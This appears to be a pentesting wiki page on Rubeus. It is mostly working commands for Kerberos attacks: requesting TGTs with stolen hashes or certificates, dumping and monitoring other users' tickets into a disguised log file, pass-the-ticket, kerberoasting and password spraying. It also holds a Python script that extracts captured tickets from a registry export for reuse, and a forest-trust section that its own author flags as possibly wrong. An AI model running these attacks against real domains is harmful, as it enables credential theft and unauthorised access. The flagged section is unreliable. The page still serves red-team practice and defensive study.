# Rubeus.exe
[Rubeus](https://github.com/GhostPack/Rubeus) is GhostPack's C# toolkit for raw Kerberos interaction: requesting, dumping, describing and passing tickets, plus the hash-based tricks around them (asking for a TGT with an NTLM hash, kerberoasting, spraying).

## Request a TGT
```
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
```
:::tip
If doing `asktgt` for a machine account, keep the trailing dollar sign, e.g. `/user:DC01$`; without it the KDC looks up a user named `DC01` and the request fails.
:::

### Request a TGT with a pfx file (ESC1)
You'd do this, for example, after abusing ESC1 with [certify.exe](/pentesting/Internal/certify) (the ESC8 flow goes through NTLM relay rather than certify and is covered in the next section). Certify hands back the certificate and private key as PEM text, so convert that to a PFX first; if you protect the PFX with a password, give it to Rubeus with `/password:`.

```
Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt
```

### Request a TGT with a pfx file (ESC8)
ESC8 (relaying NTLM to the CA's web enrollment endpoint) leaves you with a PFX for the relayed account, typically a machine account such as `DC01$`. `certipy auth` does PKINIT with it and prints the account's NT hash, which `asktgt` can then use like any other hash; you can also skip the hash step and point `asktgt` straight at the PFX with `/certificate:` as in the previous section.

```
# prints the NT hash for the account in the cert (and writes a ccache)
certipy auth -pfx blah.pfx -domain domain.com
# request a TGT with that hash; /nowrap prints the base64 ticket on one line
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
# paste the base64 blob asktgt just printed
rubeus.exe ptt /ticket:THE-BASE64-TGT-FROM-THE-ASKTGT-OUTPUT-ABOVE
```

### Request a TGT when abusing forest trusts [ UNDER REVIEW ]

:::danger

*I was working on this in a lab and don't think this section below is right, so ignore it until further review.*

:::

If you've got DA on DOMAIN2.COM and want to use that against DOMAIN1.COM, and you've pulled the domain SIDs with [get-adobject](/cmd/Windows/get-adobject) *and* the inter-realm trust key with [mimikatz](/pentesting/Internal/mimikatz), you can ask DOMAIN1.COM for a TGT as the trust account (`DOMAIN2$`, whose password is that trust key). Note that this TGT belongs to the trust account itself, which is unprivileged in DOMAIN1.COM; it is a starting point, not DA:

```
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap
```

## Dump tickets on a local machine
Unless you're elevated you only see your own logon session's tickets; run as local admin/SYSTEM to pull TGTs from every session on the box. `/service:krbtgt` filters the output to TGTs only:
```
rubeus.exe dump /service:krbtgt /nowrap
```

## Monitor mode on a local machine
This is handy when you're WinRM'd into a box with local/domain admin creds and want to capture TGTs from other users' logon sessions as they show up. The `/registry:` switch stashes everything it finds under `HKLM\SOFTWARE\MONITOR`, which is useful when your shell doesn't keep a scrollback (`/interval` and `/runfor` are in seconds):

```
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
```

### Monitor mode - save to disk
If for some reason the TGTs won't write to the registry, have Rubeus write its console output to a file instead:
```
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log
```

### Extracting TGTs from registry hives after monitor mode attack
Once you've run the monitor "attack" and captured TGTs to the registry, use [reg.exe](/cmd/Windows/reg) to export the key (`reg export` writes a UTF-16LE `.reg` text file you can carry off the box):

```
reg export HKLM\SOFTWARE\MONITOR backup1.reg
```

:::tip
The base64 Rubeus prints is just a base64-encoded `.kirbi` (a KRB-CRED), so decoding it gives you a kirbi directly; use something like [rubeus2ccache](/pentesting/Internal/rubeus2ccache) to convert it to `ccache` for Impacket-style tooling ([reference](https://tw1sm.github.io/2021-02-01-kerberos-conversion/)). Then you can use [rubeus](/pentesting/Internal/rubeus) `ptt` to pass the TGT on Windows.
:::
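Pulling the tickets back out of that `.reg` export by hand gets old fast, so here is an added example (my own script, not part of this page or of Rubeus) that does it. It makes no assumption about the value names Rubeus uses under `SOFTWARE\MONITOR`: it walks every value in the file, handles the UTF-16 encoding and backslash-continued `hex(...)` lines that `reg export` produces, and keeps any base64 run that decodes to a KRB-CRED (outer DER tag `0x76`, which is what a `.kirbi` starts with), writing each one out as a `.kirbi` you can feed to `ptt` or convert to `ccache`. The embedded `.reg` text is constructed for the demo and the ticket bytes in it are a stand-in, not a real ticket.

```python
import base64
import re
import sys
from pathlib import Path

# Outer DER tag of a KRB-CRED ([APPLICATION 22], constructed): the first byte of any .kirbi.
KRB_CRED_TAG = 0x76

_VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')
_HEX_RE = re.compile(r'^hex(?:\((?P<kind>[0-9a-fA-F]+)\))?:(?P<body>.*)$')
_B64_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def read_reg_file(path):
    """reg.exe writes UTF-16LE with a BOM; fall back to 8-bit for hand-edited files."""
    raw = Path(path).read_bytes()
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("latin-1")


def logical_lines(text):
    """Join the backslash-continued lines reg.exe emits for long hex values."""
    out, buf = [], ""
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.endswith("\\"):
            buf += stripped[:-1]
            continue
        out.append(buf + stripped)
        buf = ""
    if buf:
        out.append(buf)
    return out


def decode_value(data):
    """Turn the right-hand side of a .reg value line into bytes (None for dword/unknown)."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        # REG_SZ: undo the \\ and \" escaping; base64 is ASCII so any encoding is fine here
        return re.sub(r"\\(.)", r"\1", data[1:-1]).encode("utf-8")
    m = _HEX_RE.match(data)
    if not m:
        return None
    raw = bytes(int(h, 16) for h in m.group("body").split(",") if h.strip())
    if m.group("kind") in ("2", "7"):
        # REG_EXPAND_SZ / REG_MULTI_SZ are UTF-16LE; NULs separate multi-sz entries
        text = raw.decode("utf-16-le", errors="ignore").replace("\x00", "\n")
        return text.encode("utf-8")
    return raw  # hex: (REG_BINARY) and anything else is left as raw bytes


def extract_kirbis(reg_text):
    """Return [(key_path, value_name, kirbi_bytes)] for every value holding a base64 KRB-CRED."""
    found, key = [], None
    for line in logical_lines(reg_text):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _VALUE_RE.match(line)
        if not m:
            continue
        blob = decode_value(m.group("data"))
        if blob is None:
            continue
        for token in _B64_RE.findall(blob):
            try:
                decoded = base64.b64decode(token, validate=True)
            except ValueError:  # binascii.Error is a ValueError: bad padding / not really base64
                continue
            if decoded and decoded[0] == KRB_CRED_TAG:
                found.append((key, m.group("name"), decoded))
    return found


def write_kirbis(found, outdir):
    """Write each ticket to <outdir>/<n>_<value_name>.kirbi and return the paths."""
    outdir = Path(outdir)
    outdir.mkdir(parents=True, exist_ok=True)
    paths = []
    for i, (_, name, blob) in enumerate(found):
        safe = re.sub(r"[^A-Za-z0-9._-]", "_", name) or "ticket"
        path = outdir / f"{i}_{safe}.kirbi"
        path.write_bytes(blob)
        paths.append(path)
    return paths


# Constructed demo input: NOT a real ticket, just bytes starting with the KRB-CRED tag,
# in a .reg export shaped like `reg export HKLM\SOFTWARE\MONITOR backup1.reg` output.
# The value names below are made up; the parser does not depend on what Rubeus names them.
SAMPLE_KIRBI = b"\x76\x0d\x30\x0b\xa0\x03\x02\x01\x05\xa1\x04\x02\x02\x00\x16"
_SAMPLE_B64 = base64.b64encode(SAMPLE_KIRBI).decode()
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\MONITOR]\r\n"
    '"Note"="nothing to see here"\r\n'
    '"Ticket0"="' + _SAMPLE_B64 + '"\r\n'
    '"Ticket1"=hex(2):'
    + ",".join(f"{b:02x}" for b in (_SAMPLE_B64 + "\x00").encode("utf-16-le")) + "\r\n"
)

if __name__ == "__main__":
    text = read_reg_file(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REG
    tickets = extract_kirbis(text)
    for key, name, blob in tickets:
        print(f"{key}\\{name}: {len(blob)}-byte KRB-CRED")
    if len(sys.argv) > 2:
        for path in write_kirbis(tickets, sys.argv[2]):
            print("wrote", path)
```

Run it with the exported file and an output directory (`python extract_kirbis.py backup1.reg tickets/`, the script name being whatever you saved it as); with no arguments it runs against the embedded sample. Scanning for the `0x76` tag rather than trusting value names means it also works on a `consoleoutfile` log or any other dump where the base64 is mixed in with text.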

## Describe a ticket
```
rubeus.exe describe /ticket:base64ticket
```

This came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it, and was getting all sorts of errors. When I ran the `describe` command, the output said `KeyType=180`, which I learned means Credential Guard is in place and that ticket won't work anywhere else but the box it came from!

## Pass-the-ticket
```
rubeus.exe ptt /ticket:xxx
```

## Kerberoasting attack
```
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
```

## Password spraying
In GhostPack's Rubeus the spraying module is the `brute` command (there is no `spray` verb). Give it one password, the domain and a DC; if you don't pass `/users:` it pulls the user list from the domain over LDAP, so check the lockout threshold before you fire this off. By default each hit also prints that user's TGT; add `/noticket` if you only want the results:
```
rubeus.exe brute /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
```

### Password spraying (with passwords file)
Same command as above, except instead of `/password:SomePassword` you pass a list:
```
/passwords:file-full-of-passwords.txt
```
